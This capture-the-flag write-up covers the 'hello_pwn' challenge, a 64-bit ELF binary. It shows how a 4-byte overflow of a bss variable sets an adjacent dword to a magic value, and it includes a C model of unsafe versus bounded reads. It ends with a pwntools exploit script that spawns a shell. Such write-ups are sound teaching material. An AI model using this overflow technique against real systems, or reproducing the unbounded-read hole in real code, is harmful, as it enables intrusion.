0x00 Foreword
The file and checksec steps are omitted here. The target is a 64-bit ELF program.
0x10 Steps
0x11 The main function
![](http://39.106.75.175/wp-content/uploads/2020/02/2020-02-21_181104.png)
In the main function, we can see that the program lets us write input to unk_601068, and that to get a shell we need dword_60106c to hold the value 1853186401.
0x12 Observing the bss segment
![](http://39.106.75.175/wp-content/uploads/2020/02/2020-02-21_181149.png)
The bss listing shows that these two variables are not far apart: unk_601068 and dword_60106c are 4 bytes from each other. So when we write to the first one, we can send 4 bytes of unrelated filler and then the packed value 1853186401, which ends up in the dword. That is, the payload is payload = b'a' * 4 + p64(1853186401)
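The overlap described above, modelled in C as an added example (not code from the original post or from the challenge binary). The struct is a constructed stand-in for the 4 bytes at unk_601068 followed by dword_60106c; the function names and the assumption that the program's read is not limited to 4 bytes are mine, since the read length is only visible in the screenshot.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAGIC 1853186401u /* value from the write-up, 0x6E756161 */

/* Constructed model of the layout: 4 bytes at unk_601068, then dword_60106c. */
struct bss_model {
    unsigned char buf[4];   /* stands in for unk_601068 */
    unsigned char dword[4]; /* stands in for dword_60106c */
};

/* Constructed payload bytes: 'a' * 4 followed by the value packed as a
   64-bit little-endian integer (what p64 produces). */
static const unsigned char PAYLOAD[12] = {
    'a', 'a', 'a', 'a', 0x61, 0x61, 0x75, 0x6E, 0, 0, 0, 0};

/* Decode the dword the way x86-64 reads it (little-endian). */
static uint32_t dword_value(const struct bss_model *m)
{
    return (uint32_t)m->dword[0] | (uint32_t)m->dword[1] << 8 |
           (uint32_t)m->dword[2] << 16 | (uint32_t)m->dword[3] << 24;
}

/* Vulnerable pattern: the length is not tied to sizeof buf, so bytes 4..7
   land in dword. Copying into the whole struct models that without UB. */
static uint32_t unsafe_read(struct bss_model *m, const unsigned char *in, size_t n)
{
    if (n > sizeof *m) n = sizeof *m; /* the model ends after the dword */
    memcpy(m, in, n);
    return dword_value(m);
}

/* Hardened pattern: clamp the length to the destination object. */
static uint32_t bounded_read(struct bss_model *m, const unsigned char *in, size_t n)
{
    if (n > sizeof m->buf) n = sizeof m->buf;
    memcpy(m->buf, in, n);
    return dword_value(m);
}

int main(void)
{
    struct bss_model a = {{0}, {0}}, b = {{0}, {0}};
    printf("unsafe:  dword=0x%08x\n", (unsigned)unsafe_read(&a, PAYLOAD, sizeof PAYLOAD));
    printf("bounded: dword=0x%08x\n", (unsigned)bounded_read(&b, PAYLOAD, sizeof PAYLOAD));
    return 0;
}
```

The four zero bytes at the end of the packed value fall past the dword and are dropped by the model; with the bounded copy the dword keeps its initial value and the comparison against 1853186401 fails.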
0x20 exp
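```python
from pwn import *

# Start the local challenge binary
sh = process("./hello_pwn")
# 4 filler bytes for unk_601068, then the packed value that lands in dword_60106c
payload = b'a' * 4 + p64(1853186401)
sh.recvuntil(b"bof")  # wait for the prompt
sh.sendline(payload)
sh.interactive()
```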